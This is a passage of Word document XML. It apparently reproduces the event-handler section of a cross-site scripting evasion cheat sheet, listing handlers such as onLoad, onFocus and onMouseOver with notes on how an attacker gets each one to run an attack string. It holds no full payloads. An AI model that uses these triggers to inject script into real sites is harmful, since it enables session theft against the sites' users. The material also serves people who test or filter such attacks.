          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>execCommand("Copy")</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onBeforeCut()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker executes the attack string right before a selection is cut)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onBeforeDeactivate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires right after the activeElement is changed from the current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onBeforeEditFocus()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)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onBeforePaste()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user needs to be tricked into pasting or be forced into it using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>execCommand("Paste")</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onBeforePrint()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would need to be tricked into printing or attacker could use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>print()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>execCommand("Print")</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onBeforeUnload()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)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onBeforeUpdate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (activates on data object before updating data in the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onBegin()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the onbegin event fires immediately when the element's timeline begins)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onBlur()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (in the case where another popup is loaded and window looses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onBounce()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)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lastRenderedPageBreak/>
        <w:t>onCellChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when data changes in the data provider)</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onChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (select, text, or TEXTAREA field loses focus and its value has been modified)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onClick()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (someone clicks on a form)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onContextMenu()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would need to right click on attack area)</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onControlSelect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when the user is about to make a control selection of the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onCopy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user needs to copy something or it can be exploited using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>execCommand("Copy")</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> command)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onCut()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user needs to copy something or it can be exploited using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>execCommand("Cut")</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> command)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onDataAvailable()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would need to change data in an element, or attacker could perform the same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onDataSetChanged()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when the data set exposed by a data source object changes)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onDataSetComplete()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires to indicate that all data is available from the data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onDblClick()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user double-clicks a form element or a link)</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onDeactivate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when the activeElement is changed from the current object to another object in the parent document)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onDrag()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (requires that the user drags an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onDragEnd()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (requires that the user drags an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onDragLeave()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (requires that the user drags an object off a valid location)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onDragEnter()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (requires that the user drags an object into a valid location)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onDragOver()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (requires that the user drags an object into a valid location)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onDragDrop()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user drops an object (e.g. file) onto the browser window)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onDragStart()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (occurs when user starts drag operation)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onDrop()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user drops an object (e.g. file) onto the browser window)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onEnd()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the onEnd event fires when the timeline ends.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onError()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (loading of a document or image causes an error)</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onErrorUpdate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires on a databound object when an error occurs while updating the associated data in the data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onFilterChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when a visual filter completes state change)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onFinish()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker can create the exploit when marquee is finished looping)</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onFocus()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker executes the attack string when the window gets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onFocusIn()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker executes the attack string when window gets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onFocusOut()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker executes the attack string when window looses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onHashChange()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires when the fragment identifier part of the document's current address changed)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onHelp()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker executes the attack string when users hits F1 while the window is in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onInput()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the text content of an element is changed through the user interface)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onKeyDown()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user depresses a key)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onKeyPress()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user presses or holds down a key)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onKeyUp()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user releases a key)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lastRenderedPageBreak/>
        <w:t>onLayoutComplete()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would have to print or print preview)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onLoad()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker executes the attack string after the window loads)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onLoseCapture()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (can be exploited by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>releaseCapture()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> method)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onMediaComplete()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (When a streaming media file is used, this event could fire before the file starts playing)</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onMediaError()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (User opens a page in the browser that contains a media file, and the event fires when there is a problem)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onMessage()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fire when the document received a message)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onMouseDown()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the attacker would need to get the user to click on an image)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onMouseEnter()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (cursor moves over an object or area)</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onMouseLeave()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the attacker would need to get the user to mouse over an image or table and then off again)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onMouseMove()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the attacker would need to get the user to mouse over an image or table)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onMouseOut()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the attacker would need to get the user to mouse over an image or table and then off again)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onMouseOver()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (cursor moves over an object or area)</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onMouseUp()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the attacker would need to get the user to click on an image)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onMouseWheel()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the attacker would need to get the user to use their mouse wheel)</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onMove()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would move the 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onMoveEnd()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would move the 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onMoveStart()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user or attacker would move the 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onOffline()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (occurs if the browser is working in online mode and it starts to work offline)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onOnline()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (occurs if the browser is working in offline mode and it starts to work online)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onOutOfSync()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (interrupt the element's ability to play its media as defined by the timeline)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onPaste()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (user would need to paste or attacker could use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>execCommand("Paste")</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onPause()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (the onpause event fires on every element that is active when the timeline pauses, including the body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onPopState()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
